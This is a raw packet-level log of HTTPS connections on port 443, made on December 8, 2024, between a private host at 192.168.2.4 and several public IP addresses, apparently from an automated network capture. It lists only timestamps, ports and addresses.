                                                                          Dec 8, 2024 20:51:26.652928114 CET49856443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:26.653063059 CET49856443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:26.653073072 CET4434985613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:26.679337978 CET4434985435.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:26.683775902 CET49854443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:26.683789968 CET4434985435.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:26.690948963 CET4434984420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:26.690969944 CET4434984420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:26.691003084 CET4434984420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:26.691071033 CET49844443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:26.691071033 CET49844443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:26.691088915 CET4434984420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:26.691250086 CET49844443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:26.691262960 CET4434984420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:26.691288948 CET49844443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:26.691394091 CET4434984420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:26.691425085 CET4434984420.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:26.691818953 CET49844443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:26.730633020 CET49854443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:26.875163078 CET4434984813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:26.875756979 CET49848443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:26.875775099 CET4434984813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:26.875919104 CET4434984913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:26.876319885 CET49848443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:26.876326084 CET4434984813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:26.876435041 CET49849443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:26.876455069 CET4434984913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:26.876792908 CET49849443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:26.876797915 CET4434984913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:26.877891064 CET4434985013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:26.878525972 CET49850443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:26.878525972 CET49850443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:26.878540039 CET4434985013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:26.878546953 CET4434985013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:26.887051105 CET4434984713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:26.887105942 CET4434984713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:26.887330055 CET49847443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:26.887330055 CET49847443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:26.887428045 CET49847443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:26.887449980 CET4434984713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:26.889642954 CET49857443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:26.889677048 CET4434985713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:26.889889956 CET49857443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:26.889961958 CET49857443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:26.889972925 CET4434985713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:26.982721090 CET4434985135.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:26.982820034 CET4434985135.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:26.983061075 CET49851443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:26.983072996 CET4434985135.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:26.983100891 CET49851443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:26.983143091 CET49851443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:26.983983040 CET49858443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:26.984000921 CET4434985835.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:26.984097958 CET4434985235.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:26.984154940 CET49858443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:26.984189987 CET4434985235.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:26.984255075 CET49852443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:26.984375000 CET49852443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:26.984384060 CET4434985235.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:26.984673023 CET4434985335.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:26.984772921 CET4434985335.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:26.984915018 CET49853443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:26.984915972 CET49859443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:26.984935045 CET4434985935.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:26.985167027 CET49858443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:26.985173941 CET4434985835.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:26.985208035 CET49859443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:26.985383987 CET49853443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:26.985394001 CET4434985335.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:26.985902071 CET49860443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:26.985915899 CET4434986035.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:26.986058950 CET49859443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:26.986068964 CET4434985935.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:26.986109018 CET49860443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:26.987351894 CET49860443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:26.987365007 CET4434986035.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:27.104221106 CET4434985435.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:27.104283094 CET4434985435.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:27.104897976 CET49854443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:27.104899883 CET49861443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:27.104917049 CET4434985435.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:27.104919910 CET4434986135.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:27.104960918 CET49854443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:27.105003119 CET49854443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:27.105005026 CET49861443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:27.105216980 CET49861443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:27.105226994 CET4434986135.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:27.318321943 CET4434984813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:27.318391085 CET4434984813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:27.319327116 CET4434984913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:27.319386959 CET4434984913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:27.319416046 CET49848443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:27.319416046 CET49848443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:27.319452047 CET49848443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:27.319458961 CET49849443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:27.319468975 CET4434984813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:27.320450068 CET49849443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:27.320450068 CET49849443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:27.320467949 CET4434984913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:27.320477962 CET4434984913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:27.322606087 CET49862443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:27.322632074 CET4434986213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:27.323349953 CET49863443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:27.323386908 CET4434986313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:27.323416948 CET49862443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:27.323611021 CET49863443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:27.323832989 CET49862443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:27.323842049 CET49863443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:27.323844910 CET4434986213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:27.323860884 CET4434986313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:27.331561089 CET4434985013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:27.331609964 CET4434985013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:27.331762075 CET49850443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:27.331844091 CET49850443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:27.331844091 CET49850443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:27.331856012 CET4434985013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:27.331865072 CET4434985013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:27.333914995 CET49864443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:27.333959103 CET4434986413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:27.334064960 CET49864443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:27.334194899 CET49864443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:27.334213018 CET4434986413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:27.409836054 CET44349798104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:27.409909964 CET44349798104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:27.410069942 CET49798443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:27.844005108 CET4434985520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:27.844501019 CET49855443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:27.844547987 CET4434985520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:27.845143080 CET49855443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:27.845143080 CET49855443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:27.845153093 CET4434985520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:27.845168114 CET4434985520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:28.107500076 CET49798443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:28.107543945 CET44349798104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:28.216170073 CET4434985935.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.216849089 CET49859443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.216862917 CET4434985935.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.217269897 CET4434985935.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.218204975 CET4434985835.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.218338966 CET4434986035.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.221124887 CET49860443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.221153021 CET4434986035.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.221245050 CET49858443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.221268892 CET4434985835.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.221584082 CET4434985835.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.221756935 CET49859443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.221829891 CET4434985935.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.222088099 CET4434986035.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.222148895 CET49860443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.222168922 CET49858443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.222224951 CET4434985835.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.222480059 CET49860443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.222533941 CET4434986035.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.222573042 CET49859443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.222707033 CET49858443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.222798109 CET49860443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.222804070 CET4434986035.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.263331890 CET4434985935.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.263334990 CET4434985835.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.272006989 CET49860443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.317451954 CET4434986135.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.317676067 CET49861443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.317722082 CET4434986135.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.318025112 CET4434986135.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.318463087 CET49861443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.318516016 CET4434986135.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.318582058 CET49861443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.318607092 CET49861443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.318613052 CET4434986135.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.383610964 CET4434985613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:28.384109020 CET49856443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:28.384128094 CET4434985613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:28.384536982 CET49856443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:28.384541035 CET4434985613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:28.489983082 CET4434985520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:28.490009069 CET4434985520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:28.490050077 CET4434985520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:28.490070105 CET49855443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:28.490087986 CET4434985520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:28.490097046 CET49855443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:28.490397930 CET49855443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:28.490407944 CET4434985520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:28.490415096 CET49855443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:28.490547895 CET4434985520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:28.490575075 CET4434985520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:28.490621090 CET49855443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:28.509521008 CET49865443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:28.509571075 CET4434986520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:28.509635925 CET49865443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:28.509782076 CET49865443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:28.509794950 CET4434986520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:28.534394979 CET44349823142.250.181.100192.168.2.4
                                                                          Dec 8, 2024 20:51:28.534460068 CET44349823142.250.181.100192.168.2.4
                                                                          Dec 8, 2024 20:51:28.534511089 CET49823443192.168.2.4142.250.181.100
                                                                          Dec 8, 2024 20:51:28.628844976 CET4434985713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:28.629297018 CET49857443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:28.629317999 CET4434985713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:28.629725933 CET49857443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:28.629729986 CET4434985713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:28.676487923 CET4434985935.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.676561117 CET4434985935.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.676748037 CET49859443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.676769972 CET49859443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.676769972 CET49859443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.676781893 CET4434985935.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.676840067 CET49859443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.678719044 CET4434985835.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.678781033 CET4434985835.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.678828955 CET49858443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.678874016 CET49858443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.678884029 CET4434985835.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.678893089 CET49858443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.678920031 CET49858443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.679775000 CET4434986035.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.679861069 CET4434986035.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.679924011 CET49860443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.679944992 CET4434986035.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.679954052 CET49860443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.680011988 CET49860443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.797087908 CET4434986135.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.797143936 CET4434986135.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.797197104 CET49861443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.797303915 CET49861443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.797321081 CET4434986135.190.80.1192.168.2.4
                                                                          Dec 8, 2024 20:51:28.797332048 CET49861443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.797394991 CET49861443192.168.2.435.190.80.1
                                                                          Dec 8, 2024 20:51:28.825742960 CET4434985613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:28.825808048 CET4434985613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:28.825917959 CET49856443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:28.826005936 CET49856443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:28.826014996 CET4434985613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:28.826030970 CET49856443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:28.826035023 CET4434985613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:28.828641891 CET49866443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:28.828674078 CET4434986613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:28.828720093 CET49866443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:28.828953981 CET49866443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:28.828968048 CET4434986613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.045167923 CET4434986313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.046116114 CET49863443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.046116114 CET49863443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.046130896 CET4434986313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.046143055 CET4434986313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.141330004 CET4434985713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.141381979 CET4434985713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.141521931 CET49857443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.141680002 CET49857443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.141680002 CET49857443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.141693115 CET4434985713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.141701937 CET4434985713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.144450903 CET49867443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.144474983 CET4434986713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.144643068 CET49867443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.144716978 CET49867443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.144722939 CET4434986713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.216068029 CET4434986213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.216103077 CET4434986413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.216835976 CET49862443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.216836929 CET49862443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.216860056 CET4434986213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.216878891 CET4434986213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.217205048 CET49864443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.217226028 CET4434986413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.218369007 CET49864443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.218375921 CET4434986413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.478488922 CET4434986313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.478554964 CET4434986313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.479620934 CET49863443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.479620934 CET49863443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.479780912 CET49863443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.479798079 CET4434986313.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.485398054 CET49868443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.485439062 CET4434986813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.489729881 CET49868443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.489729881 CET49868443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.489758968 CET4434986813.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.650688887 CET4434986213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.650759935 CET4434986213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.651010036 CET49862443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.651010036 CET49862443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.651010036 CET49862443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.651288986 CET4434986413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.651371002 CET4434986413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.651515007 CET49864443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.651638031 CET49864443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.651638031 CET49864443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.651657104 CET4434986413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.651667118 CET4434986413.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.653820992 CET49870443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.653820992 CET49869443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.653851032 CET4434987013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.653861046 CET4434986913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.654114962 CET49869443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.654118061 CET49870443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.654257059 CET49869443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.654259920 CET49870443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.654270887 CET4434987013.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.654270887 CET4434986913.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:29.870481014 CET49862443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:29.870527029 CET4434986213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:30.107407093 CET49823443192.168.2.4142.250.181.100
                                                                          Dec 8, 2024 20:51:30.107451916 CET44349823142.250.181.100192.168.2.4
                                                                          Dec 8, 2024 20:51:30.354247093 CET4434986520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:30.354835033 CET49865443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:30.354860067 CET4434986520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:30.355421066 CET49865443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:30.355424881 CET4434986520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:30.355443001 CET49865443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:30.355451107 CET49865443192.168.2.420.190.147.8
                                                                          Dec 8, 2024 20:51:30.355458975 CET4434986520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:30.355473995 CET4434986520.190.147.8192.168.2.4
                                                                          Dec 8, 2024 20:51:30.541904926 CET4434986613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:30.542388916 CET49866443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:30.542409897 CET4434986613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:30.543433905 CET49866443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:30.543440104 CET4434986613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:30.754812002 CET49871443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:30.754856110 CET44349871104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:30.754988909 CET49871443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:30.755816936 CET49871443192.168.2.4104.21.53.171
                                                                          Dec 8, 2024 20:51:30.755825996 CET44349871104.21.53.171192.168.2.4
                                                                          Dec 8, 2024 20:51:30.862425089 CET4434986713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:30.862875938 CET49867443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:30.862903118 CET4434986713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:30.863298893 CET49867443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:30.863306999 CET4434986713.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:30.976661921 CET4434986613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:30.976727009 CET4434986613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:30.976783037 CET49866443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:30.976999044 CET49866443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:30.976999044 CET49866443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:30.977015972 CET4434986613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:30.977041006 CET4434986613.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:30.982745886 CET49872443192.168.2.413.107.246.63
                                                                          Dec 8, 2024 20:51:30.982790947 CET4434987213.107.246.63192.168.2.4
                                                                          Dec 8, 2024 20:51:30.982923031 CET49872443192.168.2.413.107.246.63
